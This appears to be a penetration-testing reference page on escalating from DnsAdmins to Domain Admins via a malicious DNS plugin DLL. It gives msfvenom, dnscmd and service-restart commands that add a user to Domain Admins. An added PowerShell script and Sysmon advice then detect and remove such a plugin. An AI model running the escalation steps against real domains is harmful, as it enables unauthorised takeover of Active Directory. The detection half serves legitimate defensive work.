DnsAdmins
ABOUT
Members of the DnsAdmins group can manage DNS information within the domain. The Windows DNS service supports custom plugin DLLs, which can execute functions to resolve name queries beyond the locally hosted DNS zones. Because the DNS service runs as NT AUTHORITY\SYSTEM, membership in this group can be abused to escalate privileges on a Domain Controller or on a dedicated DNS server for the domain. The built-in dnscmd utility can set the path of the plugin DLL, which is stored in the registry value ServerLevelPluginDll under the DNS service's Parameters key.
Importing custom plugin
Generating malicious DLL
msfvenom -p windows/x64/exec cmd='net group "domain admins" ven17 /add /domain' -f dll -o adduser.dll
Starting local HTTP server
python3 -m http.server 1337
Loading DLL
You must be a member of the DnsAdmins group for this step to succeed.
C:\> dnscmd.exe /config /serverlevelplugindll C:\Users\ven17\Desktop\adduser.dll
If successful:
Registry property serverlevelplugindll successfully reset.
Restart DNS Service
C:\> sc.exe stop dns
C:\> sc.exe start dns
Confirm Admin Privileges
PS C:\> net group "Domain Admins" /dom
Cleanup
Confirm the registry value was added
C:\> reg query \\13.13.13.13\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters
Delete the registry value
C:\> reg delete \\13.13.13.13\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll
Restart DNS Service
C:\> sc.exe start dns
C:\> sc query dns
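The cleanup section above queries and deletes the ServerLevelPluginDll value by hand. The following PowerShell script, an added example that is not part of the original page, does the defensive version of the same check: it reads that value from a DNS server's registry, flags plugin paths that point at user-writable or remote locations, records the DLL's signature status and SHA-256 hash when the file is present, optionally clears the value, and lists who is currently in DnsAdmins (the precondition for the technique). The -ComputerName and -Remediate parameters and the path patterns treated as suspicious are assumptions of this example; the RSAT ActiveDirectory module is assumed to be installed for the group listing.

```powershell
# Added audit example (not from the original page). Run as an administrator
# on, or against, a Windows DNS server / Domain Controller.
# Assumptions: the -ComputerName and -Remediate parameters are this script's
# own; the "suspicious path" patterns are illustrative; Get-ADGroupMember
# needs the RSAT ActiveDirectory module.
param(
    [string]$ComputerName = $env:COMPUTERNAME,   # host whose registry is audited
    [switch]$Remediate                            # clear the value if it is set
)

$keyPath   = 'SYSTEM\CurrentControlSet\Services\DNS\Parameters'
$valueName = 'ServerLevelPluginDll'

# Open HKLM on the target (local or remote) and read the plugin value.
$hklm   = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', $ComputerName)
$key    = $hklm.OpenSubKey($keyPath, $Remediate.IsPresent)
$plugin = if ($key) { $key.GetValue($valueName) } else { $null }

if ([string]::IsNullOrEmpty($plugin)) {
    Write-Output "[OK] $ComputerName : $valueName is not set"
} else {
    Write-Warning "[ALERT] $ComputerName : $valueName = $plugin"

    # A plugin under a user profile, a temp directory or a UNC path is a red
    # flag: a legitimate plugin would live with the DNS server binaries.
    if ($plugin -match '^\\\\|\\Users\\|\\Temp\\') {
        Write-Warning "        plugin path is user-writable or remote"
    }

    # The path is interpreted by the DNS server, so this file check is only
    # meaningful when the script runs on that server itself.
    if ($ComputerName -eq $env:COMPUTERNAME -and (Test-Path -LiteralPath $plugin)) {
        $sig  = Get-AuthenticodeSignature -FilePath $plugin
        $hash = (Get-FileHash -Algorithm SHA256 -Path $plugin).Hash
        Write-Output "        signature: $($sig.Status)  sha256: $hash"
    } else {
        Write-Output "        DLL not checked on this host (path is relative to $ComputerName)"
    }

    if ($Remediate) {
        # Same effect as: reg delete ...\DNS\Parameters /v ServerLevelPluginDll
        $key.DeleteValue($valueName)
        Write-Output "        value removed; restart the DNS service to unload the plugin"
    }
}

# Membership of DnsAdmins is what makes the technique possible; review it.
try {
    Import-Module ActiveDirectory -ErrorAction Stop
    Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
        Select-Object objectClass, SamAccountName, DistinguishedName |
        Format-Table -AutoSize
} catch {
    Write-Warning "ActiveDirectory module unavailable: $($_.Exception.Message)"
}
```

Run it without switches for a read-only audit; add -Remediate to clear the value and then restart the DNS service as in the cleanup section so the plugin is actually unloaded. For continuous detection rather than periodic auditing, a write to HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll is exactly the kind of registry change that Sysmon (Event ID 13, registry value set) or an equivalent EDR rule should alert on, together with unexpected changes to DnsAdmins membership.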